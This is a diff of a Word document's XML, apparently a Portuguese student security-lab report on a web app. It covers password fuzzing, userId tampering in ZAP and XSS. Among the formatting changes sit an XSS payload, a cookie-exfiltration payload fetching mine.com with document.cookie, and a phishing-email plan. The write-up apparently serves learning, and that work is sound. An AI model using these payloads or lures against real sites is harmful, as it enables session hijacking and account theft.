                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId17" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7941,11 +9275,16 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="708025"/>
+                      <a:ext cx="5400040" cy="708058"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -7956,9 +9295,83 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>sendo a senha correta admin123.</w:t>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Fuzzer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> utilizado para descobrir a palavra-passe</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7985,6 +9398,8 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
@@ -8005,6 +9420,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="14"/>
         </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
@@ -8021,6 +9437,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>review</w:t>
@@ -8032,6 +9450,13 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve"> de um produto</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8041,6 +9466,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="14"/>
         </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
@@ -8052,6 +9478,13 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>Capturar o mesmo no ZAP e verificar quais os parâmetros que são enviados</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8061,69 +9494,242 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="14"/>
         </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">É possível aferir o uso de um </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>userId</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> no pedido, utilizar o ZAP para alterar os parâmetros enviados e submeter </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>novamente</w:t>
-      </w:r>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24527697" wp14:editId="201AEF8A">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>-10160</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>3318510</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5400040" cy="635"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="529925995" name="Text Box 1"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5400040" cy="635"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:prstClr val="white"/>
+                        </a:solidFill>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                                <w:i w:val="0"/>
+                                <w:iCs w:val="0"/>
+                                <w:noProof/>
+                                <w:sz w:val="22"/>
+                                <w:szCs w:val="22"/>
+                                <w:lang w:val="pt-PT"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:i w:val="0"/>
+                                <w:iCs w:val="0"/>
+                                <w:lang w:val="pt-PT"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figura </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:i w:val="0"/>
+                                <w:iCs w:val="0"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="begin"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:i w:val="0"/>
+                                <w:iCs w:val="0"/>
+                                <w:lang w:val="pt-PT"/>
+                              </w:rPr>
+                              <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:i w:val="0"/>
+                                <w:iCs w:val="0"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="separate"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:i w:val="0"/>
+                                <w:iCs w:val="0"/>
+                                <w:noProof/>
+                                <w:lang w:val="pt-PT"/>
+                              </w:rPr>
+                              <w:t>9</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:i w:val="0"/>
+                                <w:iCs w:val="0"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="end"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:i w:val="0"/>
+                                <w:iCs w:val="0"/>
+                                <w:lang w:val="pt-PT"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> - Utilização do ZAP para alterar os parâmetros enviados</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype w14:anchorId="24527697" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Text Box 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.8pt;margin-top:261.3pt;width:425.2pt;height:.05pt;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Caption"/>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                          <w:i w:val="0"/>
+                          <w:iCs w:val="0"/>
+                          <w:noProof/>
+                          <w:sz w:val="22"/>
+                          <w:szCs w:val="22"/>
+                          <w:lang w:val="pt-PT"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:i w:val="0"/>
+                          <w:iCs w:val="0"/>
+                          <w:lang w:val="pt-PT"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figura </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:i w:val="0"/>
+                          <w:iCs w:val="0"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="begin"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:i w:val="0"/>
+                          <w:iCs w:val="0"/>
+                          <w:lang w:val="pt-PT"/>
+                        </w:rPr>
+                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:i w:val="0"/>
+                          <w:iCs w:val="0"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="separate"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:i w:val="0"/>
+                          <w:iCs w:val="0"/>
+                          <w:noProof/>
+                          <w:lang w:val="pt-PT"/>
+                        </w:rPr>
+                        <w:t>9</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:i w:val="0"/>
+                          <w:iCs w:val="0"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="end"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:i w:val="0"/>
+                          <w:iCs w:val="0"/>
+                          <w:lang w:val="pt-PT"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> - Utilização do ZAP para alterar os parâmetros enviados</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-        <w:t>alterou-se o userId para 1)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50C8C7C1" wp14:editId="156E90BE">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50C8C7C1" wp14:editId="0A984F0B">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>right</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>433705</wp:posOffset>
+            </wp:positionV>
             <wp:extent cx="5400040" cy="2827655"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:effectExtent l="19050" t="19050" r="10160" b="10795"/>
+            <wp:wrapSquare wrapText="bothSides"/>
             <wp:docPr id="2036579609" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -8136,7 +9742,13 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId18" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8149,13 +9761,73 @@
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
             </a:graphic>
-          </wp:inline>
+          </wp:anchor>
         </w:drawing>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">É possível aferir o uso de um </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>userId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> no pedido, utilizar o ZAP para alterar os parâmetros enviados e submeter </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>novamente</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>alterou-se o userId para 1)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8322,18 +9994,12 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="15"/>
         </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
@@ -8344,39 +10010,11 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
-        <w:t>Para resolver o desafio bas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-        <w:t>ta adicionar no URL ou na query de search: &lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-        <w:t>iframe src="javascript:alert('xss')"&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, visto não ter qualquer tipo de sanitização por parte da </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>aplicação</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t>Para resolver o desafio basta adicionar no URL ou na query de search: &lt;iframe src="javascript:alert('xss')"&gt;, visto não ter qualquer tipo de sanitização por parte da aplicação</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
@@ -8479,6 +10117,7 @@
           <w:noProof/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13B61141" wp14:editId="6AB5D0E5">
             <wp:extent cx="5400040" cy="1651000"/>
@@ -8531,6 +10170,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="15"/>
         </w:numPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
@@ -8591,13 +10231,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>at</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>aques</w:t>
+        <w:t>ataques</w:t>
       </w:r>
       <w:bookmarkEnd w:id="19"/>
       <w:proofErr w:type="spellEnd"/>
@@ -8610,11 +10244,13 @@
           <w:numId w:val="16"/>
         </w:numPr>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:t>Um possível ataque seria:</w:t>
@@ -8627,49 +10263,58 @@
           <w:ilvl w:val="1"/>
           <w:numId w:val="16"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:t>Em vez de um alerta enviar um pedido para um website conhecido pelo malfeitor que remetia as cookies do utilizador autenticado.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:br/>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
         <w:t>&lt;</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
         <w:t>iframe</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
         <w:t xml:space="preserve"> src="</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
         <w:t>javascript:fetch</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>('https://</w:t>
-      </w:r>
-      <w:r>
-        <w:t>mine</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.com/</w:t>
-      </w:r>
-      <w:r>
-        <w:t>auth</w:t>
-      </w:r>
-      <w:r>
-        <w:t>?cookie='+document.cookie)"&gt;</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>('https://mine.com/auth?cookie='+document.cookie)"&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8679,21 +10324,18 @@
           <w:ilvl w:val="1"/>
           <w:numId w:val="16"/>
         </w:numPr>
-        <w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
-        <w:t>Codificar um URL malicioso, u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-        <w:t>tilizando por exemplo, a vulnerabilidade antiga do search, e obfuscar o URL.</w:t>
+        <w:t>Codificar um URL malicioso, utilizando por exemplo, a vulnerabilidade antiga do search, e obfuscar o URL.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8703,15 +10345,17 @@
           <w:ilvl w:val="1"/>
           <w:numId w:val="16"/>
         </w:numPr>
-        <w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Enviar um email para utilizadores do website a incentivar o acesso do mesmo através do link malicioso, por exemplo, “Vem ver quantos gostos o teu post já tem”</w:t>
       </w:r>
     </w:p>
@@ -8722,30 +10366,36 @@
           <w:ilvl w:val="1"/>
           <w:numId w:val="16"/>
         </w:numPr>
-        <w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:t>Através do token da vitima é possível obter os dados do website da mesma, desde o respetivo userId,  email, e outr</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
         <w:t>a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
